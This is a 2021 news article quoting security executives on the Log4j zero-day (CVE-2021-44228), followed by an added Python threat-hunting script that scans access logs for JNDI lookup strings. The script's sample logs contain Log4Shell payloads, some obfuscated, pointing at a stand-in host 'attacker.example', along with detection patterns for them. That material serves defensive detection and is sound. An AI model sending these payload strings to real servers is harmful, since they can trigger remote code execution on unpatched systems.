Updated: Dec 12, 2021
A new zero-day vulnerability has been discovered in a widely used Java logging library called “Apache Log4j” that is easy to exploit and enables attackers to gain full control of affected servers. While the vulnerability was first discovered in Minecraft, it is expected to have wide-reaching implications due to the vast number of enterprise applications that use the Log4j tool.
Arshan Dabirsiaghi, Co-founder and Chief Scientist at Contrast Security, shared his insight on this troubling new exploit risk. He believes that organizations must take a more proactive approach to securing their Java applications:
“Any Java application that logs data uses Log4j, which is the most popular logging framework in the Java ecosystem and is used by millions of applications. This zero-day exploit impacts any application using Log4j and allows attackers to run malicious code and commands on other systems. Make no mistake, this is the largest Java vulnerability we have seen in years. It’s absolutely brutal.
There are three main questions that teams should answer now—where does this impact me, how can I mitigate the impact right now to prevent exploitation, and how can I locate this and similar issues to prevent future exploitation?”
Kunal Anand, CTO of Imperva, weighed in:
“In terms of magnitude, this will, without any doubt, have a big impact on all organizations running Java workloads. Similar to other common vulnerabilities and exposures (CVEs) in its class (referring to those affecting Struts 2 back in 2017), best practices require security teams to immediately patch their software and upgrade third-party components to meet SLAs. Since rolling out updated security rules more than 13 hours ago, Imperva has observed 1.4M+ attacks targeting CVE-2021-44228. We’ve observed peaks reaching roughly 280K attacks per hour. As with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.
As the lifecycle of CVE-2021-44228 is getting started, we can’t help but be reminded of the myriad of Struts 2 CVEs from 2017. Similarly, organizations of all sizes are going to be forced to identify and patch first- and third-party applications and APIs. We also recommend that customers implement RASP as part of a broader defense-in-depth strategy for protecting their applications and APIs.”
Andrii Bezverkhyi, founder and CEO, SOC Prime shared his perspective:
“The problem with Log4j is that every major tech on our planet that has Java uses it, and the exploit has been around since March. This is worse than Zerologon; it could get as bad as WannaCry. As defenders, we need to do 3 things: work on mitigation, hunt to understand if we were breached since March, and report the status to our Board of Directors for tactical and strategic support. Mitigation is hard. It will take months of work for every company, but it’s important to start today so we can get there faster. Threat Intelligence and real-time detections must be treated with care, as we will literally swarm our SOC Analysts with alerts or skyrocket our SOAR bills by auto-blocking massive numbers of IPs and domains, which grow by the hour.
Threat hunting must be a high priority. You should be running continuous detections while patching and protecting the network. That means putting alerts in place and querying the logs to search for evidence of attempts to exploit while you are patching the vulnerability. This will be an ongoing effort for the next few months. Enterprises with large security teams have the resources to do this and are well underway with their mitigation process, but there are thousands of organizations without threat hunters on staff that will remain vulnerable to this potentially devastating exploit. For these organizations, it will be important to tap into the power of the cybersecurity community, which has mobilized quickly and come together in the face of an urgent and widespread threat. The world’s best threat hunters are already publishing research that will help organizations detect and mitigate against the Log4j vulnerability, and posting that research to threat detection marketplaces. We are seeing a very powerful demonstration of the impact of the global threat hunting community, and that’s why behavioral threat detection is finally at the point of being an indispensable capability in any cyber defender’s arsenal.”
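The log querying the quote above calls for, as an added example that is not part of the article or of SOC Prime's own detection content: it scans constructed web-server access-log lines for the CVE-2021-44228 lookup marker, first collapsing the nested-lookup obfuscations that public detection rules already cover, and then aggregates hits per source address so one noisy scanner produces one alert rather than a flood. The log lines, IP addresses and `attacker.example` hostnames are all constructed sample data.

```python
import re
from collections import Counter

# Constructed sample access-log lines (not taken from the article). The last field is the
# User-Agent, a header commonly logged and therefore commonly probed for this bug.
SAMPLE_LOGS = [
    '203.0.113.5 - - [11/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [11/Dec/2021:10:01:06 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://attacker.example/b}"',
    '198.51.100.7 - - [11/Dec/2021:10:02:00 +0000] "GET /api HTTP/1.1" 200 90 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
    '198.51.100.7 - - [11/Dec/2021:10:02:01 +0000] "GET /healthz HTTP/1.1" 200 2 "-" "curl/7.79"',
]

# Nested lookups that resolve to a literal: ${lower:x}, ${upper:x}, and the
# default-value form ${name:-x} (including the empty-name ${::-x} variant).
# The prefix class excludes "$" and "{" so an outer "${" is never swallowed.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^}]*)\}|\$\{[^${}]*:-([^}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{jndi:")
_SRC = re.compile(r"^(\S+)")


def normalize(s: str) -> str:
    """Resolve nested lookups until a fixpoint so the outer ${jndi: marker becomes visible."""
    prev = None
    while prev != s:
        prev = s
        s = _NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
    return s.lower()


def is_exploit_attempt(line: str) -> bool:
    """True when the line carries a JNDI lookup string after de-obfuscation."""
    return bool(_JNDI.search(normalize(line)))


def hunt(lines):
    """Return (flagged lines, attempts per source IP) for per-source alerting."""
    flagged = [line for line in lines if is_exploit_attempt(line)]
    per_source = Counter(_SRC.match(line).group(1) for line in flagged)
    return flagged, per_source


if __name__ == "__main__":
    hits, by_source = hunt(SAMPLE_LOGS)
    for src, n in by_source.most_common():
        print(f"{src}: {n} exploitation attempt(s)")
```

Feeding real logs means replacing `SAMPLE_LOGS` with lines read from the web tier, reverse proxy and application logs, since any logged header or parameter is a candidate injection point.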